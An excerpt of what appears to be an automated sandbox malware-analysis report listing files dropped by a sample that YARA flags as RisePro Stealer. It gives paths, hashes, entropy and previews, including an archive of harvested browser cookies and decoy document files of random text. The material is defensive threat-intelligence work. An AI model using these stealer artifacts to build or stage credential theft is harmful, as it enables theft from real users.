                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\M5gQOMOo3fGmoJBomt4v2FX.zip, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK........Q..X................Cookies\..PK........Q..X........$.......Cookies\Chrome_Default.txt....P...5.........`.L2J1l..\@.k.D..M'.t.k[Op...k...=..#T......?T...y..8.!(.h.>....o?.E.<.....EvWV.A....r,.4..|...u..<..4..T..w..1....._V..a..jZ....qcY..:.T.I.................l9.u..M.n.Q.W..Y3..".i...N.....;.n....t..].|-8|....W..v.....If&xA,}.`+5~.....Yx-..3..><9.]K.)..in.. .H=.@..FEH.a..<...0.j...t.J,=>6..z.k.x...N...f*.R.+.Y...~i.I..4.....p.Wm...5j.............*....tI..t.o..E....PK........Q..X..=.............information.txt}X.o.6..7....^.lV.%...R7M...'..d..D;Be.....}'.J.S"......w..?n.4..E........$..x.p0.|.+=F7[..6...Q2f......a..d......p...(.".qI.h....0!.%.1....m-.o.X$..#A.pD..#..5RXh....`....w.4.L..O...Z.....$....T5.YX=..d.0+.U...w.0.]...#.?<....]^.D.......C...|8.l..?.(L.n.z.P...%............l.T..".H..F...LeBw;...Ui.U.p..j.N.U.L.<....H.8...h.....7.....p0..m...g..........o._/....@.F.g7.!SI.I..t..<.6H.UxG Qo.?.l..WpPg...p.U.,._9..<[.I..Nn...1..d.8_.....&.)

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_Files_\BNAGMGSPLO.docx

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.701704028955216
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
                                                                                                                                                                                                                                        MD5:5F97B24D9F05FA0379F5E540DA8A05B0
                                                                                                                                                                                                                                        SHA1:D4E1A893EFD370529484B46EE2F40595842C849E
                                                                                                                                                                                                                                        SHA-256:58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
                                                                                                                                                                                                                                        SHA-512:A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_Files_\EEGWXUHVUG.docx

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.690299109915258
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                                                                                                                                                                                                        MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                                                                                                                                                                                                        SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                                                                                                                                                                                                        SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                                                                                                                                                                                                        SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_Files_\GRXZDKKVDB.xlsx

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.697358951122591
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                                                                                                                                                                        MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                                                                                                                                                                        SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                                                                                                                                                                        SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                                                                                                                                                                        SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_Files_\NVWZAPQSQL.docx

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.6998645060098685
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                                                                                                                                                                        MD5:1676F91570425F6566A5746BC8E8427E
                                                                                                                                                                                                                                        SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                                                                                                                                                                        SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                                                                                                                                                                        SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_Files_\NVWZAPQSQL.xlsx

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.6998645060098685
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                                                                                                                                                                        MD5:1676F91570425F6566A5746BC8E8427E
                                                                                                                                                                                                                                        SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                                                                                                                                                                        SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                                                                                                                                                                        SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_Files_\PALRGUCVEH.xlsx

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.696508269038202
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                                                        MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                                                        SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                                                        SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                                                        SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_Files_\SQSJKEBWDT.docx

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.698473196318807
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                                                                                                                                                                                                                                        MD5:4D0D308F391353530363283961DF2C54
                                                                                                                                                                                                                                        SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                                                                                                                                                                                                                                        SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                                                                                                                                                                                                                                        SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_Files_\SQSJKEBWDT.xlsx

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.698473196318807
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                                                                                                                                                                                                                                        MD5:4D0D308F391353530363283961DF2C54
                                                                                                                                                                                                                                        SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                                                                                                                                                                                                                                        SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                                                                                                                                                                                                                                        SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cgrqKzIZDKj22M18G57j8co.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2898
                                                                                                                                                                                                                                        Entropy (8bit):7.7482996670963695
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:99amL8DZI1sxTiRLUAkvdjzSKTkQUbhGOV5y8jujY+sGWFo8ukn3KJ69knOrzw:F8DQUi1UnvBWKGUOVE8jbFuk3KJR
                                                                                                                                                                                                                                        MD5:9CB23163405F7FD7A1ABB0A3E16D824D
                                                                                                                                                                                                                                        SHA1:883651C5AC503F7E0225E94401C3D712B20B47EF
                                                                                                                                                                                                                                        SHA-256:3742D90DA9E4062EC70BFABBB7E4BD387E73BD02A0F87E10B756AE8F0AA8B8BA
                                                                                                                                                                                                                                        SHA-512:32F2EA51B8F15B092FC55CF76A151DDB3EB3EB27EE3677985D7277960C3C0CEDDAE471C01815766BB310245D4C6C15904E8752EF905DBC45ED114F26A33CAE4F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\cgrqKzIZDKj22M18G57j8co.zip, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
